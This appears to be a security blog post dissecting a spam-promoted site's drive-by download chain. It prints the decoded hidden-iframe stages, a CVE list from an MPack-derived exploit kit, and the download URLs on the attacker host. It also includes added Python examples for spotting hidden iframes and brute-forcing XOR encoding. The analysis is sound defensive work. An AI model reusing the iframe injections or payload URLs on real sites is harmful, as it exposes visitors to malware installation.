There is a website which is aggressively advertised in spam. It contains an unsavory (well, matter of taste) video. But what's the business in it? You guessed it (I hope): http:// 2j1f . com/ installs malware.
The main page contains two encoded scripts. The second one (near the end) looks like a traffic counter. Really. Let's see the first one (after decoding):
<script>window.status="Done"</script>
<iframe src="header_01.gif" width=0 height=0></iframe>
The file called header_01.gif is not an image but a script, and is also encoded. The decoded code is:
<script>window.status="Done"</script>
<iframe src="http:// currentsession . net /session/index.php?usermode=start&action=level3" width=0 height=0></iframe>
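The two decoded stages above share one tell: a zero-size iframe pointing at the next hop. The following Python is an added example (not code from the post) that scans an HTML document for iframes hidden by zero or one-pixel dimensions or by inline style and returns their targets; the sample HTML is constructed here, modelled on the decoded snippets, with the real hostname replaced by the placeholder example.invalid.

```python
from html.parser import HTMLParser

# Constructed sample, modelled on the two decoded stages quoted in the post.
# The hostname is a placeholder, not the one from the post.
SAMPLE_HTML = """
<html><body>
<script>window.status="Done"</script>
<iframe src="header_01.gif" width=0 height=0></iframe>
<iframe src="http://example.invalid/session/index.php?usermode=start&action=level3" width=0 height=0></iframe>
<iframe src="https://example.invalid/embed" width="640" height="360"></iframe>
<iframe src="https://example.invalid/hidden" style="display: none"></iframe>
</body></html>
"""


def _dim(value):
    """Parse a width/height attribute such as '0', '1', '0px' or '100%'; None if unparsable."""
    v = value.strip().lower().rstrip("px").rstrip("%")
    try:
        return float(v)
    except ValueError:
        return None


def is_hidden(attrs):
    """True if the iframe attributes describe an element a user would never see."""
    w = _dim(attrs.get("width", ""))
    h = _dim(attrs.get("height", ""))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class HiddenIframeFinder(HTMLParser):
    """Collect the src of every iframe that is_hidden() flags."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # Unquoted values such as width=0 arrive as ("width", "0"); a bare
        # attribute arrives with value None, so normalise to "".
        a = {k.lower(): (v or "") for k, v in attrs}
        if is_hidden(a):
            self.hidden.append(a.get("src", ""))


def find_hidden_iframes(html):
    """Return the src values of hidden iframes, in document order."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hidden


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", src)
```

Run over a decoded page this prints the chain of next hops (here header_01.gif and the index.php URL) while leaving the visible 640x360 embed alone; on a real page you would feed it the output of your own decoder stage rather than the raw obfuscated script.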
Okay, we now have a 45 kilobyte script full of exploits. Summary:
CVE-2008-0625 Yahoo! Music Jukebox Yahoo! MediaGrid ActiveX control vulnerability
downloads: http:// currentsession . net /session/yahoofile.php?action=download&mode=abc
CVE-2007-3147 Yahoo! Webcam image upload ActiveX control vulnerability
downloads: see above
CVE-2007-2222 Microsoft Speech API ActiveX control vulnerability
downloads: http:// currentsession . net /session/dspeechfile.php?action=download&mode=abc
CVE-2008-0660 FaceBook PhotoUploader vulnerability
downloads: http:// currentsession . net /session/facebfile.php?action=download&mode=abc
MILW0RM:5102 another FaceBook PhotoUploader vulnerability
downloads: see above
At the end there is a script encoded with an XOR algorithm. It's a collection of exploits and is borrowed straight from MPack's megapack1.php (version ~0.94). Summary:
CVE-2006-3730 WebViewFolderIcon
CVE-2006-0003 MDAC
CVE-2007-0015 Quicktime RTSP
CVE-2006-5198 Winzip
These download http:// currentsession . net /session/file.php?action=download&mode=abc
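The XOR-encoded stage mentioned above is the kind of blob an analyst has to peel before the exploit list can be read. The Python below is an added example (not from the post) of the usual first attempt: assume a single-byte key, try all 256 values, and rank candidates by how printable they are and whether script markers appear. The key length is an assumption for illustration; the post does not say how the kit encodes this stage. The sample plaintext and key are constructed here.

```python
# Byte values we expect in a decoded script: printable ASCII plus tab/newline/CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

# Markers that strongly suggest a correctly decoded web-exploit stage.
MARKERS = (b"<script", b"eval(", b"document.write", b"unescape(", b"<iframe")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (encode and decode are the same)."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that look like text; 0.0 for empty input."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def recover_single_byte_xor(blob: bytes):
    """Return (key, plaintext) for the candidate key that yields the most script-like output."""
    best_score, best_key, best_plain = -1.0, None, b""
    for key in range(256):
        candidate = xor_bytes(blob, key)
        score = printable_ratio(candidate)
        # A marker hit outweighs any printable-ratio difference between keys.
        if any(m in candidate.lower() for m in MARKERS):
            score += 1.0
        if score > best_score:
            best_score, best_key, best_plain = score, key, candidate
    return best_key, best_plain


# Constructed sample: a short script fragment encoded with a made-up key.
SAMPLE_KEY = 0x5A
SAMPLE_PLAIN = b'<script>document.write(unescape("%3Ciframe%20src%3D%22x%22%3E"))</script>'
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)


if __name__ == "__main__":
    key, plain = recover_single_byte_xor(SAMPLE_BLOB)
    print(f"key=0x{key:02x}")
    print(plain.decode("ascii", errors="replace"))
```

If no key scores above the plain printable ratio, the stage is probably using a multi-byte key or a second layer on top of the XOR, and the next step is to read the decoder loop in the surrounding JavaScript rather than guess further.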
file.php, yahoofile.php, dspeechfile.php and facebfile.php currently return the same file (md5: 712bc609da304f1d25f2fec6a5d62b94), which is some downloader.